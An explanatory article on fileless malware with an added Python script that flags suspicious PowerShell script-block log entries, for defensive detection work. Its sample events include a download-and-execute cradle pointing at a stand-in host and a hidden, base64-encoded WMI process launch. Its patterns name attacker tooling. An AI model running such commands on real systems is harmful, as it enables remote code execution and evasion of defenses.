It is true that just as organizations adapt, so too do criminals. What modern criminal in their right mind would attempt to rob a Brink’s truck on horseback? That strategy might have worked in the days of the Pony Express, but attempting it now would be out of touch and inefficient. Criminals adapt to keep pace in the same way organizations do: with the help of advanced technology, they refine their modes of attack just as organizations refine the way they conduct business.
One of the more recent developments in attacker tradecraft is fileless malware. The trend emerged a few years ago but gained significant prominence in late 2016 and throughout 2017. The term refers to malware that is specifically designed and architected so that it does not require, or in fact interact with, the filesystem of the host on which it runs (the code still has to live somewhere, typically in memory, the registry or the WMI repository, but not as a conventional executable on disk). Technology professionals need to be alert to this, because it affects them in several different ways.
First, it alters what they should watch for when analyzing attacker activity: fileless malware has different characteristics from traditional malware, so it requires looking for different indicators. Second, it changes how practitioners plan and execute their response to a malware incident. Attackers use this method precisely because it circumvents many of the techniques used to detect and mitigate attacks.
Sometimes referred to as “non-malware,” fileless malware leverages on-system tools such as PowerShell, Office macros, Windows Management Instrumentation (WMI) or other built-in scripting functionality to propagate, execute and perform whatever tasks it was developed to perform. By design, an attacker employing this technique refrains from writing anything to the filesystem, because the primary defense strategy for detecting malicious code, file scanning, has nothing to scan when no file is ever written.
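As an added example (not part of the original article), the following Python script shows what “looking for different indicators” means in practice. It runs a handful of heuristics over script-block text of the kind Windows records when PowerShell Script Block Logging is enabled (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log): download cradles, in-memory execution via Invoke-Expression, WMI process creation, hidden-window or no-profile launches, and -EncodedCommand payloads, which it decodes (base64 of UTF-16LE, as PowerShell expects) and rescans. The sample events, the indicator names, the URL and the scoring rule are all constructed for this example and are not a vendor’s rule set.

```python
import base64
import binascii
import re

# Heuristics for the on-system tooling fileless tradecraft leans on.
# Indicator names are chosen for this example, not taken from any product.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|Start-BitsTransfer)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I),
    "wmi_process_create": re.compile(
        r"\bInvoke-(?:Wmi|Cim)Method\b.*\bWin32_Process\b", re.I | re.S),
    "hidden_or_noprofile": re.compile(
        r"-(?:W(?:indowStyle)?\s+Hidden|NoP(?:rofile)?)\b", re.I),
}
# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_for_powershell(cmd):
    """Encode a command the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED_CMD.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(text):
    """Return the sorted list of indicator names found in one script block."""
    found = set()
    decoded = decode_encoded_command(text)
    if decoded is not None:
        found.add("encoded_command")
    # Scan the raw text and, when present, the decoded payload: the payload
    # is where the real command lives; the encoding exists to hide it.
    for candidate in (text, decoded or ""):
        for name, pattern in INDICATORS.items():
            if pattern.search(candidate):
                found.add(name)
    return sorted(found)


def verdict(indicators):
    """Constructed scoring rule: two independent indicators in one block is worth an analyst's time."""
    if len(indicators) >= 2:
        return "suspicious"
    return "review" if indicators else "benign"


def scan(events):
    """Map each event id to a (verdict, indicators) pair."""
    results = {}
    for ev in events:
        inds = analyze(ev["text"])
        results[ev["id"]] = (verdict(inds), inds)
    return results


# Constructed sample records standing in for Event ID 4104 script blocks.
# Only the field the detector needs is kept; real events carry more metadata.
SAMPLE_EVENTS = [
    {"id": 1, "text": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": 2, "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"},
    {"id": 3, "text": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_for_powershell(
        "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'calc.exe'")},
    {"id": 4, "text": "Get-Service | Where-Object Status -eq 'Running'"},
]

if __name__ == "__main__":
    for ev_id, (label, inds) in scan(SAMPLE_EVENTS).items():
        print(f"event {ev_id}: {label} {inds}")
```

Run it directly to see a verdict for each sample event. The point is that none of these indicators is a file hash or a path: they are properties of the command text and of how the interpreter was launched, which is exactly what file scanning never sees. Launches driven by Office macros are better caught from process-creation telemetry (the parent/child relationship between the Office application and the script host) rather than script block text, which this example does not cover.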
Preventing this kind of attack starts with the basics. First, patch and maintain hardened endpoints. Second, get the most from the malware detection and prevention software that is already in place: turning it on, if you have not already done so, is a useful starting point, and so is enabling the features in those products and in Windows itself that log or constrain PowerShell and WMI activity, since that is where fileless activity becomes visible.